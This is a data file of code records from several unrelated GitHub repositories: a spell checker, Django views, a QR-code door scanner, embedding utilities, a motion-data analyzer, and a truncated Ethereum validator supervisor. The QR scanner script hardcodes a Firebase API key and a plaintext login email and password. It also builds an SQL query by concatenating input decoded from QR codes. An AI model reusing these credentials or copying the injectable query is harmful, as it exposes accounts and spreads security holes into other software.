-1\n for char in word[1:]:\n digit = translation[ord(char) - ord('a')]\n if cur_digit == -1:\n cur_digit = digit\n\n if digit != cur_digit:\n if cur_digit != '0':\n code.append(str(cur_digit))\n cur_digit = digit\n \n if (code[-1] != cur_digit) and (cur_digit != '0') and cur_digit != -1:\n code.append(cur_digit)\n\n result = ''.join(code[:4]) + '0' * (4 - len(code))\n return result\n\n\ndef build_soundex_index(dictionary):\n \"\"\"\n Build soundex index for dictionary words.\n :param dictionary: dictionary of original words\n :return: {'code1': ['word1_with_code1', 'word2_with_code1', ...],\n 'code2': ['word1_with_code2', 'word2_with_code2', ...], ...}\n \"\"\"\n result = {}\n\n for word in dictionary:\n code = produce_soundex_code(word)\n if code not in result:\n result[code] = [word]\n else:\n result[code].append(word)\n\n return result\n","repo_name":"DrompiX/search_engine","sub_path":"search_engine/spell_checking.py","file_name":"spell_checking.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"34163373249","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .form import AutorForm\nfrom .models import Autor\n\ndef Home(request):\n return render(request,'index.html')\n\n\n# Creating an author\ndef create_autor(request):\n if request.method == 'GET':\n autor= AutorForm()\n return render(request,'libros/create.html',{'form':autor})\n else:\n autor= AutorForm(request.POST)# Get the submitted data and store it in the variable\n if autor.is_valid():\n autor.save()\n return redirect('autores')\n\ndef autores(request):\n autores=Autor.objects.all()\n return render(request,'libros/autores.html',{'form':autores}) \n\n\n\ndef editar(request, id):\n if request.method==\"GET\":\n 
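# Aside (a hedged sketch, names are hypothetical, not this project's code):\n # the GET/POST pairs in this module follow the classic Django function-based\n # edit flow; a compact variant that also guards the save with is_valid():\n #\n # def edit_autor(request, id):\n # autor = get_object_or_404(Autor, pk=id)\n # form = AutorForm(request.POST or None, instance=autor)\n # if request.method == \"POST\" and form.is_valid():\n # form.save()\n # return redirect(\"autores\")\n # return render(request, 'libros/editar.html', {'form': form})\n 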
autor=get_object_or_404(Autor,pk=id)\n form=AutorForm(instance=autor)\n return render(request,'libros/editar.html',{'form':form})\n \n else:\n autor=get_object_or_404(Autor,pk=id)\n form=AutorForm(request.POST, instance=autor)\n form.save()\n return redirect('autores')\n \n\ndef eliminar(request, id):\n autor = get_object_or_404(Autor, id=id)\n autor.delete()\n return redirect('autores')\n \n\n# Create your views here.\n","repo_name":"ByFer12/CRUD-DJANGO","sub_path":"libro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1069812196","text":"import cv2\r\nfrom pyzbar import pyzbar\r\nimport pyrebase\r\nimport sqlite3\r\nfrom tkinter import *\r\nfrom PIL import ImageTk, Image\r\nfrom datetime import datetime\r\nimport csv\r\nimport serial as sr\r\nimport time\r\n\r\ndef getImage(id):\r\n try:\r\n img = Image.open(\"dataimage\\\\\"+id[0]+\".jpg\")\r\n return img \r\n except:\r\n print(\"No image found\")\r\n img = None\r\n return img\r\n\r\ndef get_profile(id, fullName):\r\n try:\r\n conn = sqlite3.connect('data.db')\r\n query = \"Select * from People WHERE (ID='\"+str(id)+\"' AND FullName='\"+str(fullName)+\"')\"\r\n cursor = conn.execute(query)\r\n profile = None\r\n\r\n for row in cursor:\r\n profile = row\r\n conn.close()\r\n return profile\r\n \r\n except sqlite3.OperationalError:\r\n print(\"Can't be found\")\r\n\r\ndef zoom_center(frame, zoom_factor=1.5):\r\n y_size = frame.shape[0]\r\n x_size = frame.shape[1]\r\n \r\n x1 = int(0.5*x_size*(1-1/zoom_factor))\r\n x2 = int(x_size-0.5*x_size*(1-1/zoom_factor))\r\n y1 = int(0.5*y_size*(1-1/zoom_factor))\r\n y2 = int(y_size-0.5*y_size*(1-1/zoom_factor))\r\n\r\n frame = frame[y1:y2,x1:x2]\r\n return cv2.resize(frame, None, fx=zoom_factor, fy=zoom_factor, interpolation=cv2.INTER_CUBIC)\r\n\r\ndef read_qrcode(frame, ckd, start):\r\n qrcodes = pyzbar.decode(frame, symbols=[pyzbar.ZBarSymbol.QRCODE])\r\n Id = \"\"\r\n fullName = \"\"\r\n dem = 0\r\n db = firebase.database()\r\n\r\n for qrcode in qrcodes:\r\n x, y , w, h = qrcode.rect\r\n qrcode_info = qrcode.data.decode(\"utf-8\")\r\n cv2.rectangle(frame, (x, y),(x+w, y+h), (0, 255, 0), 2)\r\n for i in qrcode_info:\r\n if dem == 0:\r\n if i == \"|\":\r\n dem+=1\r\n else:\r\n Id = Id + i\r\n elif dem == 1:\r\n if i == \"|\":\r\n dem+=1\r\n else:\r\n fullName = fullName + i\r\n elif dem == 2:\r\n break\r\n information = get_profile(Id, fullName)\r\n if information != None:\r\n if information != ckd:\r\n temp = db.child(\"informationStudent\").child(\"temp\").get().val()\r\n heart_rate = db.child(\"informationStudent\").child(\"nhip_tim\").get().val()\r\n spo2 = db.child(\"informationStudent\").child(\"spo2\").get().val()\r\n opendoor = db.child(\"informationStudent\").child(\"opendoor\").get().val()\r\n ckd = information\r\n start = time.time()\r\n if opendoor:\r\n ser.write(\"m\".encode(\"ascii\"))\r\n \r\n # cv2.putText(frame, information[0], (x + 10, y+h+30), font, 1, (255, 255, 255), 1)\r\n # cv2.putText(frame, information[1], (x + 10, y+h+60), font, 1, (255, 255, 255), 1)\r\n # cv2.putText(frame, information[2], (x + 10, y+h+90), font, 1, (255, 255, 255), 1)\r\n \r\n now = datetime.now()\r\n dt_string = now.strftime(\"%H:%M:%S\")\r\n date = now.strftime(\"%d_%m_%Y\")\r\n try:\r\n f = open(\"log\\\\\"+information[0]+\"_\"+information[1]+\"_\"+information[2]+\".csv\", \"r\", encoding = \"utf-8\")\r\n log = csv.reader(f)\r\n newLog = []\r\n for row in log:\r\n 
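# Aside (an illustrative alternative with a hypothetical file name): the\r\n # read-then-rewrite CSV bookkeeping below can also be expressed with append\r\n # mode and a one-time header:\r\n #\r\n # import csv, os\r\n # path = \"log/example_log.csv\"\r\n # is_new = not os.path.exists(path)\r\n # with open(path, \"a\", encoding=\"utf-8\", newline=\"\") as fh:\r\n # writer = csv.writer(fh)\r\n # if is_new:\r\n # writer.writerow([\"Date\", \"Time\", \"Temperature\", \"Heart rate\", \"SpO2\"])\r\n # writer.writerow([\"01_01_2022\", \"12:00:00\", 36.6, 72, 98])\r\n 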
newLog.append(row)\r\n f.close()\r\n status = \"Nothing\"\r\n except:\r\n status = None\r\n\r\n if status is None:\r\n f = open(\"log\\\\\"+information[0]+\"_\"+information[1]+\"_\"+information[2]+\".csv\", \"w\", encoding = \"utf-8\", newline = \"\")\r\n create = csv.writer(f)\r\n create.writerow([(\"Date\"), (\"Time\"), (\"Temperature\"), (\"Heart rate\"), (\"SpO2\")])\r\n create.writerow((date, dt_string, temp, heart_rate, spo2))\r\n f.close()\r\n else:\r\n newLog.append((date, dt_string, temp, heart_rate, spo2))\r\n f = open(\"log\\\\\"+information[0]+\"_\"+information[1]+\"_\"+information[2]+\".csv\", \"w\", encoding = \"utf-8\", newline = \"\")\r\n save = csv.writer(f)\r\n save.writerows(newLog)\r\n \r\n window=Tk()\r\n Label(window, text=\"National ID number: \"+information[0], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Full name: \"+information[1], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Student ID: \"+information[2], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Date of birth: \"+information[3], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Position: \"+information[4], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Measured temperature: \"+str(temp)+\"°C\", fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Measured heart rate: \"+str(heart_rate)+\" bpm\", fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Measured SpO2: \"+str(spo2)+\" %\", fg=\"black\", font=\"Helvetica\").pack()\r\n img = getImage(information)\r\n if img != None:\r\n img = img.resize((300, 350))\r\n img = ImageTk.PhotoImage(img)\r\n Label(window, image = img).pack()\r\n window.title(\"Student information\")\r\n window.geometry(\"600x550+10+20\")\r\n window.after(5000, lambda:window.destroy())\r\n window.mainloop()\r\n else:\r\n db.child(\"informationStudent\").update({\"sai_nguoi\":1})\r\n\r\n return frame, ckd, start\r\n\r\nfirebaseConfig = {\r\n 'apiKey': \"AIzaSyCt60H3fUGiPv973_fMMN51lp2XXRazjF0\",\r\n 'authDomain': \"arduino-firebase-vippro.firebaseapp.com\",\r\n 'databaseURL': \"https://arduino-firebase-vippro-default-rtdb.firebaseio.com\",\r\n 'projectId': \"arduino-firebase-vippro\",\r\n 'storageBucket': \"arduino-firebase-vippro.appspot.com\",\r\n 'messagingSenderId': \"437474413862\",\r\n 'appId': \"1:437474413862:web:92d2b1c67528bf994fc5e7\",\r\n 'measurementId': \"G-HMRKLR9EVW\",\r\n 'serviceAccount': \"serviceAccountKey.json\"\r\n}\r\n\r\nfirebase = pyrebase.initialize_app(firebaseConfig)\r\nauth = firebase.auth()\r\nemail = \"toilaminh@mail.com\"\r\npassword = \"123456\"\r\nauth.sign_in_with_email_and_password(email, password)\r\nprint(\"Successfully signed in!\")\r\n\r\nckd = None\r\nser = sr.Serial('COM5', 9600)\r\ncap = cv2.VideoCapture(0)\r\n\r\nstart = None\r\nwhile True:\r\n ret, frame = cap.read()\r\n end = time.time()\r\n frame = cv2.flip(frame, 1)\r\n frame = zoom_center(frame, 1)\r\n frame, ckd, start = read_qrcode(frame, ckd, start)\r\n if start != None:\r\n print(int(end-start))\r\n if int(end-start) > 20:\r\n ckd = None\r\n start = None\r\n cv2.imshow(\"QR code reader\", frame)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord(\"m\"):\r\n ser.write(\"m\".encode(\"ascii\"))\r\n if cv2.waitKey(1) & 0xFF == ord(\"d\"):\r\n ckd = None \r\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\r\n 
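# Note (a sketch reusing the names from this loop): each cv2.waitKey(1) call\r\n # polls the key buffer separately, so a press can be consumed by an earlier\r\n # branch; reading once per frame avoids that:\r\n #\r\n # key = cv2.waitKey(1) & 0xFF\r\n # if key == ord(\"m\"):\r\n # ser.write(\"m\".encode(\"ascii\"))\r\n # elif key == ord(\"d\"):\r\n # ckd = None\r\n # elif key == ord(\"q\"):\r\n # break\r\n 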
break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"nhattminh160901/NCKH2021-2022","sub_path":"maqr/scanqr.py","file_name":"scanqr.py","file_ext":"py","file_size_in_byte":7251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20622784810","text":"import numpy as np\n\nGLOVE_ROOTPATH = '../embedding_data/'\nGLOVE_DEFAULT_FILENAME = 'glove.6B.{}d.txt'\n\ndef build_pretrained_embedding(f):\n ''' \n Builds pretrained embedding dictionary from inputed GloVe file \\\\\n Returns a dictionary (`key`: word, `value`: word vector)\n '''\n embeddings_index = {}\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n return embeddings_index\n\ndef generate_ngram_matrix(texts, emb_dim=100, glove_path=GLOVE_ROOTPATH, glove_filename=GLOVE_DEFAULT_FILENAME):\n '''\n Builds a 2D matrix representation of the inputed `texts`\n using pretrained GloVe word embeddings.\n\n `emb_dim` must be 50, 100, 200, or 300\n\n Returns a numpy matrix with shape (?, emb_dim)\n '''\n if emb_dim not in {50, 100, 200, 300}: raise ValueError('emb_dim must be 50, 100, 200, or 300')\n f = open(glove_path + glove_filename.format(str(emb_dim)))\n emb_dict = build_pretrained_embedding(f)\n\n line_vecs = []\n for line in texts:\n vecs = []\n words = line.split(' ')\n for word in words:\n if word not in emb_dict:\n vec = np.zeros(emb_dim)\n else:\n vec = emb_dict[word]\n vecs.append(vec)\n\n line_vec = np.stack(vecs)\n line_vecs.append(line_vec)\n \n return np.stack(line_vecs)\n\ndef flatten_sentence_vectors(word_matrix):\n '''\n Returns a flattened 1D vector per sentence, with \n length equal to number of words in the sentence and\n the embedding dimension.\n\n Requires a word matrix, like the one generated by\n `generate_glove_word_vectors()`, as input.\n\n This function WILL NOT look at the pretrained \n embeddings itself, it simply flattens the matrix\n representation.\n\n in_shape: (?, x, y)\n out_shape: (?, x*y)\n '''\n new_vecs = []\n for sent_vec in word_matrix:\n r, c = sent_vec.shape\n new_vec = sent_vec.reshape((r*c))\n new_vecs.append(new_vec)\n \n return np.stack(new_vecs)\n\ndef check_embedding(text, text_embedding, emb_dict):\n '''\n Simple check to make sure an inputted sentence\n or text fragment correctly matches a matrix\n of word vectors.\n\n `text`: text fragment (str) \\\\\n `text_embedding`: appended word vectors to check \\\\\n `emb_dict`: dictionary containing embeddings\n '''\n for word, word_emb in zip(text.split(), text_embedding):\n if (emb_dict[word] != word_emb).all(): return False\n return True","repo_name":"jayantmadugula/aspect_detection_models","sub_path":"absa_code/preprocessing/embedding_generation.py","file_name":"embedding_generation.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8922419919","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import UnivariateSpline\nimport pickle\n\n\n# variables\n\n# file location\njson_addr = \"H:\\\\human recorder raw\\\\05210101.json\"\n# plot settings\nuse_plot = False\n# devide by ','.\n# M/F/B: male, female, both; H/J0-J24: head, joint number; Ro/Pi/Ya/X/Y/Z: roll, pitch, yaw, x, y, z;\nplot_pattern = \"F,H,RoPiYa\"\ninterp_pattern = \"F,H,Ya\"\n\n\n# plot\ndef plot(humans, joints, dimensions, interpolation=None):\n if len(humans) * 
len(joints) * len(dimensions) == 0:\n raise IndexError('empty plot parameter.')\n # get data\n for human in humans:\n for joint in joints:\n for dimension in dimensions:\n if joint == 'H':\n if dimension in ['x', 'y', 'z']:\n continue\n plot_data = human.__getattribute__(dimension)\n # plot\n data = np.array(plot_data)\n plt.title(f'{human.trackingId}, {human.gender}, {joint}, {dimension}')\n plt.plot(data, 'o')\n plt.show()\n else:\n dim_order = ['x', 'y', 'z', 'roll', 'pitch', 'yaw']\n plot_data = human.__getattribute__('joint_' + str(joint))\n plot_data = [plot_data[i][dim_order.index(dimension)] for i in range(len(plot_data))]\n # plot\n data = np.array(plot_data)\n plt.title(f'{human.trackingId}, {human.gender}, {joint}, {dimension}')\n plt.plot(data, 'o')\n plt.show()\n\n\n# get all target axis\ndef pick_axis(humans, pattern):\n parameters = pattern.split(',')\n if len(parameters) != 3:\n raise IndexError('wrong pattern.')\n # pick subject\n subjects = []\n if parameters[0] == 'F':\n subjects.append(pick_human(humans, 'gender', 'female'))\n elif parameters[0] == 'M':\n subjects.append(pick_human(humans, 'gender', 'male'))\n elif parameters[0] == 'B':\n subjects.append(pick_human(humans, 'gender', 'female'))\n subjects.append(pick_human(humans, 'gender', 'male'))\n else:\n raise ValueError('wrong pattern of subject picking.')\n # pick joints\n joints = []\n if 'H' in parameters[1]:\n joints.append('H')\n joints.remove('H')\n body_joints = parameters[1].split('J')\n for joint in body_joints:\n if len(joint) != 0:\n joints.append(joint)\n # pick dimensions\n dims = []\n if 'Ro' in parameters[2]:\n dims.append('roll')\n if 'Pi' in parameters[2]:\n dims.append('pitch')\n if 'Ya' in parameters[2]:\n dims.append('yaw')\n if 'X' in parameters[2]:\n dims.append('x')\n # Ya has Y!\n if 'Ya' not in parameters[2] and 'Y' in parameters[2]:\n dims.append('y')\n if 'Z' in parameters[2]:\n dims.append('z')\n\n return subjects, joints, dims\n\n\n# class to store data per human\nclass Human:\n def __init__(self, trackingId):\n self.trackingId = trackingId\n self.gender = 'not assigned'\n # head dir\n self.roll = []\n self.pitch = []\n self.yaw = []\n # joints\n self.joint_0 = []\n self.joint_1 = []\n self.joint_2 = []\n self.joint_3 = []\n self.joint_4 = []\n self.joint_5 = []\n self.joint_6 = []\n self.joint_7 = []\n self.joint_8 = []\n self.joint_9 = []\n self.joint_10 = []\n self.joint_11 = []\n self.joint_12 = []\n self.joint_13 = []\n self.joint_14 = []\n self.joint_15 = []\n self.joint_16 = []\n self.joint_17 = []\n self.joint_18 = []\n self.joint_19 = []\n self.joint_20 = []\n self.joint_21 = []\n self.joint_22 = []\n self.joint_23 = []\n self.joint_24 = []\n\n\ndef pick_human(humans, attr, value):\n for human in humans:\n if value == human.__getattribute__(attr):\n return human\n # return untracked human if no matches\n return humans[0]\n\n\ndef main():\n # 0. who am I\n\n print('>>> WHOAMI:')\n file_name = json_addr.split('\\\\')[-1][:-5]\n print('Experiment date: 2018.' + file_name[0:2] + '.' + file_name[2:4])\n print('Experiment shift: ' + file_name[4:6])\n print('Experiment session: ' + file_name[6:8])\n\n # 1. load\n\n print('>>> LOAD:')\n # separate each object\n # decode error: only one json object each file. one pair of {}.\n print('Loading file...')\n json_objects = []\n # r: read only, w: write only!!! 
DO NOT use w!!!\n with open(json_addr, 'r') as f:\n bracket_stack = 0\n json_obj = []\n for line in f:\n line = line.rstrip()\n if line[-1] == '{':\n bracket_stack += 1\n if line[-1] == '}':\n bracket_stack -= 1\n # may end with '},'\n if len(line) >= 2 and line[-2] == '}':\n bracket_stack -= 1\n json_obj.append(line)\n if bracket_stack == 0:\n json_objects.append(json_obj)\n # list.clear() clears list element in list as well.\n json_obj = []\n\n # parse each object\n json_rawdata = []\n for obj in json_objects:\n obj_str = '\\n'.join(obj)\n # load: file-like obj, loads: str, bytes, bytearray\n rawdata = json.loads(obj_str)\n json_rawdata.append(rawdata)\n\n assert len(json_objects) == len(json_rawdata)\n frame_num = len(json_rawdata) - 1\n print('Frame number: ' + str(frame_num))\n\n # 2. extract & store\n\n print('>>> STORE:')\n # start timestamp\n if 'start time' not in json_rawdata[0]:\n raise ValueError('time stamp missing')\n start_time = json_rawdata[0]['start time']\n print('Json file starts at: ' + str(start_time))\n del json_rawdata[0]\n\n # traverse through each frame\n # TODO fill the other one if body count = 1\n id_list = []\n humans = [Human(0)]\n for frame in json_rawdata:\n # check body count\n body_count = len(frame['people'])\n\n if body_count == 0:\n continue\n\n for n in range(body_count):\n # tracking ID, human struct\n trackingId = 0\n if 'trackingId' in frame['people'][n]:\n trackingId = frame['people'][n]['trackingId']\n if trackingId not in id_list:\n id_list.append(trackingId)\n humans.append(Human(trackingId))\n print(f'Created human with id: {trackingId}')\n\n human = pick_human(humans, 'trackingId', trackingId)\n\n # head orientation: pitch yaw roll\n pitch, yaw, roll = (0.0, 0.0, 0.0) # when no data\n if 'head dir' in frame['people'][n]:\n pitch, yaw, roll = (float(degree) for degree in frame['people'][n]['head dir'].split(','))\n human.pitch.append(pitch)\n human.roll.append(roll)\n human.yaw.append(yaw)\n\n # joints: 0 - 24\n for joint in range(25):\n joint_value = [0.0] * 6\n if str(joint) in frame['people'][n]:\n joint_value = frame['people'][n][str(joint)]\n value_list = human.__getattribute__('joint_' + str(joint))\n value_list.append(joint_value)\n\n # 3. gender\n\n # use average position of head joint.\n # get most longest two human instances, suggest they are valid subjects.\n if len(humans) < 2:\n raise IndexError('less than 2 humans.')\n humans.sort(key=lambda x: len(x.joint_3), reverse=True)\n person1 = humans[0]\n person2 = humans[1]\n # get horizontal coordinates of head joint\n person1_data = [person1.joint_3[i][1] for i in range(len(person1.joint_3))]\n person2_data = [person2.joint_3[i][1] for i in range(len(person2.joint_3))]\n if sum(person1_data) / len(person1_data) < sum(person2_data) / len(person2_data):\n person1.gender = 'female'\n person2.gender = 'male'\n else:\n person1.gender = 'male'\n person2.gender = 'female'\n\n # 4. plot\n\n if use_plot:\n plot_subjects, plot_joints, plot_dims = pick_axis(humans, plot_pattern)\n # plot\n plot(plot_subjects, plot_joints, plot_dims)\n\n # 5. 
time series analyse\n\n # 5.1 missing value process (interpolation)\n print('>>> INTERPOLATE:')\n for human in humans:\n if human.trackingId == 0:\n continue\n\n # data missing rate\n\n # total data count:\n data_count = frame_num * 153 # head 3 + joint 25 * 6\n #print(f'Human ID: {human.trackingId} has total data of: {data_count}')\n # get total missing value count for all axis\n missing_count = 0\n # head\n missing_count += human.roll.count(0)\n missing_count += human.pitch.count(0)\n missing_count += human.yaw.count(0)\n # joints\n for i in range(25):\n joint_data = human.__getattribute__('joint_' + str(i))\n for j in range(6):\n missing_count += [joint_data[n][j] for n in range(len(joint_data))].count(0)\n #print(f'Human ID: {human.trackingId} has Missing Values of: {missing_count}')\n print(f'Human ID: {human.trackingId} \\'s missing rate is: {missing_count/data_count}')\n\n # interpolation (3d spline)\n print('Interpolating...')\n interp_subjects, interp_joints, interp_dims = pick_axis(humans, interp_pattern)\n splines = {}\n for human in interp_subjects:\n for joint in interp_joints:\n for dimension in interp_dims:\n if joint == 'H':\n if dimension in ['x', 'y', 'z']:\n continue\n interp_data = human.__getattribute__(dimension)\n else:\n dim_order = ['x', 'y', 'z', 'roll', 'pitch', 'yaw']\n interp_data = human.__getattribute__('joint_' + str(joint))\n interp_data = [interp_data[i][dim_order.index(dimension)] for i in range(len(interp_data))]\n data = np.array(interp_data)\n # 0 -> np.nan\n np.place(data, data == 0, np.nan)\n # interpolate, see scipy documentation\n x = np.arange(len(data))\n w = np.isnan(data)\n data[w] = 0.\n splines[f'{human.trackingId}&{joint}&{dimension}'] = UnivariateSpline(x, data, w=~w)\n\n # save as pickle\n with open('data.pickle', 'wb') as f:\n pickle.dump(data, f)\n with open('spline.pickle', 'wb') as f:\n pickle.dump(splines[f'{human.trackingId}&{joint}&{dimension}'], f)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Sun-Yuting/Human_Recorder_Analyzer","sub_path":"Analyzer.py","file_name":"Analyzer.py","file_ext":"py","file_size_in_byte":10759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14122819379","text":"import os\n\nAPP_FOLDER = 'C:\\\\Users\\\\wanga\\\\Desktop\\\\Personal\\\\Machine Learning\\\\Sophomore AI Class\\\\Bird, Not Bird Data\\\\not_bird'\n\ntotalFiles = 0\ntotalDir = 0\nsubDirs = []\nfirstRunDone = False\n\ndirIndex = 0\nfor _, dirs, files in os.walk(APP_FOLDER):\n if not firstRunDone:\n subDirs = dirs\n firstRunDone = True\n continue\n totalDir += 1\n filesInDir = 0\n for Files in files:\n filesInDir += 1\n print(f'# of files in {subDirs[dirIndex]}: {filesInDir}')\n totalFiles += filesInDir\n dirIndex += 1\n\n\nprint('Total # of files',totalFiles)\nprint('Total # of directories',totalDir)\n","repo_name":"aragorn-w/Bird-Cam","sub_path":"Data Collection Scripts/file_counter.py","file_name":"file_counter.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19370065190","text":"# -*- coding: utf-8 -*-\nfrom splib3.objectmodel import SofaPrefab\n\n@SofaPrefab\nclass Interaction(object):\n \"\"\"\n Store a list of mechanical object to interact with\n\n Args:\n\n targets ([objects]) the object to interact with and that don't have a solver\n\n \"\"\"\n\n def __init__(self, parent, targets):\n self.node = parent.addChild(\"Interaction\")\n 
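# Usage sketch, following the constructor signature above (the scene and\n # target node names are hypothetical):\n #\n # interaction = Interaction(rootNode, targets=[rootNode.cube, rootNode.sphere])\n 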
self.node.addObject(\"EulerImplicitSolver\")\n self.node.addObject(\"CGLinearSolver\", iterations=25, tolerance=1e-5, threshold=1e-5)\n for target in targets:\n self.node.addChild(target)\n","repo_name":"SofaDefrost/STLIB","sub_path":"python3/src/stlib3/scene/interaction.py","file_name":"interaction.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"39855496496","text":"# -*- coding: utf-8 -*-\nBOT_NAME = 'gysta'\n\nSPIDER_MODULES = ['gysta.spiders']\nNEWSPIDER_MODULE = 'gysta.spiders'\n\nROBOTSTXT_OBEY = False\n\nDOWNLOAD_DELAY = 3\nDEFAULT_REQUEST_HEADERS = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en',\n 'Referer': 'http://activity.gysta.gov.cn/index.html',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',\n}\n\nITEM_PIPELINES = {\n 'gysta.pipelines.GystaPipeline': 100,\n # 'gysta.pipelines.GystaMongoDBPipeline': 200,\n}\n\n# LOG_LEVEL = \"WARNING\"\n","repo_name":"liurongsheng/Python","sub_path":"爬虫方向/爬虫实例/gysta/gysta/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"19225308153","text":"\"\"\"\nThe module exporting the ValidatorSupervisor.\n\nThis module is the main interface for the validator supervisor which is the top level object\nmanaging the Ethereum 2.0 validator and other supporting subprocesses, as well as the remote\ncontrol RPC interface.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport datetime\nimport json\nimport logging\nimport os.path\nimport shutil\nfrom ssl import SSLContext, PROTOCOL_TLS_SERVER\nimport tempfile\nfrom typing import Dict, List, Optional, Union\n\nfrom .backup_archive import BackupArchive, LockedArchiveCorrupted, make_validator_data_backup\nfrom .config import Config, DynamicConfig, read_dynamic_config, write_dynamic_config\nfrom .eip2335 import EIP2335KeystoreSchema\nfrom .exceptions import ValidatorRunning, UnlockRequired, UnknownNode\nfrom .key_ops import RootKey, IncorrectPassword\nfrom .promtail import Promtail\nfrom .rpc.server import RpcServer, RpcTarget\nfrom .ssh import SSHForward, SSHClient, SSHTunnel, TcpSocket, UnixSocket, DEFAULT_BASTION_SSH_PORT\nfrom .subprocess import start_supervised, start_supervised_multi\nfrom .validators import \\\n BeaconNodePortMap, ValidatorRelease, ValidatorRunner, ValidatorReleaseSchema, \\\n create_validator_for_release, get_validator_impls\n\nLOG = logging.getLogger(__name__)\n\nCANONICAL_DIR_NAME = 'canonical'\nSSH_KNOWN_HOSTS_FILENAME = 'ssh_known_hosts'\nCONTROL_RPC_SOCKNAME = 'rpc.sock'\nRETRY_DELAY = 10\nDYNAMIC_CONFIG_FILENAME = 'dynamic_config.yml'\nDEFAULT_VALIDATOR_CONTAINER_NAME = 'validator-supervisor_validator'\n\n\nclass ScpFailure(Exception):\n pass\n\n\nclass OutOfPorts(Exception):\n pass\n\n\nclass ValidatorSupervisor(RpcTarget):\n \"\"\"\n ValidatorSupervisor is the top level object managing the Ethereum 2.0 validator and other\n supporting subprocesses, as well as the remote control RPC interface.\n\n The ValidatorSupervisor initializes and supervises a number of subprocesses, such as SSH\n connections, restarting them if they error or go down. 
The supervisor opens SSH connections to\n all remote nodes for forwarding local logs to Loki using Promtail and creating a reverse SSH\n tunnel from the remote node to the local JSON-RPC over TCP interface. The supervisor also\n configures and starts the Promtail process and the RPC interface. Most importantly, the\n supervisor selects one remote node at a time to create a SSH tunnel to the beacon node and runs\n a local Ethereum 2.0 validator which connects to the beacon node through that tunnel.\n\n The ValidatorSupervisor also loads and saves archives of the validator state, which are\n encrypted by a key that is only ever stored in RAM on the validator machine. The decryption key\n is provided on initialization, and the supervisor loads the latest backup on startup and saves\n the latest validator state to a new archive on shutdown. These archives are timestamped and\n stored both locally on disk and uploaded to the remote nodes via SCP.\n \"\"\"\n\n _root_key: Optional[RootKey]\n _backup_key: Optional[bytes]\n _exit_event: asyncio.Event\n\n def __init__(\n self,\n config: Config,\n root_key: Optional[RootKey],\n exit_event: asyncio.Event,\n enable_promtail: bool = False,\n retry_delay: int = RETRY_DELAY,\n validator_container_name: str = DEFAULT_VALIDATOR_CONTAINER_NAME,\n ):\n self.nodes = config.nodes\n self.config = config\n self.root_key = root_key\n self._next_port, self._end_port = config.port_range\n self._retry_delay = retry_delay\n self._validator_container_name = validator_container_name\n\n if not config.nodes:\n raise ValueError(\"config must have at least one node\")\n\n self._dynamic_config_path = os.path.join(config.data_dir, DYNAMIC_CONFIG_FILENAME)\n if os.path.exists(self._dynamic_config_path):\n self.dynamic_config = read_dynamic_config(self._dynamic_config_path)\n else:\n self.dynamic_config = DynamicConfig()\n\n self._validator_data_tmpdir = tempfile.TemporaryDirectory(\n prefix='validator_supervisor-validator_data',\n dir='/dev/shm', # Create tempdir in tmpfs\n )\n self._validator_canonical_dir = \\\n os.path.join(self._validator_data_tmpdir.name, CANONICAL_DIR_NAME)\n\n known_hosts_file = os.path.join(self.config.data_dir, SSH_KNOWN_HOSTS_FILENAME)\n known_hosts_lock = asyncio.Lock()\n self.rpc_sock_path = os.path.abspath(\n os.path.join(self.config.data_dir, CONTROL_RPC_SOCKNAME),\n )\n\n self._beacon_node_port_maps = [\n BeaconNodePortMap(\n host_id=(node.host, node.port),\n lighthouse_rpc=self._alloc_port(),\n prysm_http=self._alloc_port(),\n prysm_grpc=self._alloc_port(),\n )\n for node in config.nodes\n ]\n port_maps: List[List[Union[SSHForward]]] = [\n [\n SSHForward(\n TcpSocket.localhost(beacon_node_port_map.prysm_http),\n TcpSocket('host.docker.internal', 3500),\n ),\n SSHForward(\n TcpSocket.localhost(beacon_node_port_map.prysm_grpc),\n TcpSocket('host.docker.internal', 4000),\n ),\n SSHForward(\n TcpSocket.localhost(beacon_node_port_map.lighthouse_rpc),\n TcpSocket('host.docker.internal', 5052),\n ),\n SSHForward(TcpSocket.localhost(self._alloc_port()), TcpSocket('loki', 3100)),\n # Reverse tunnel to local SSH server\n 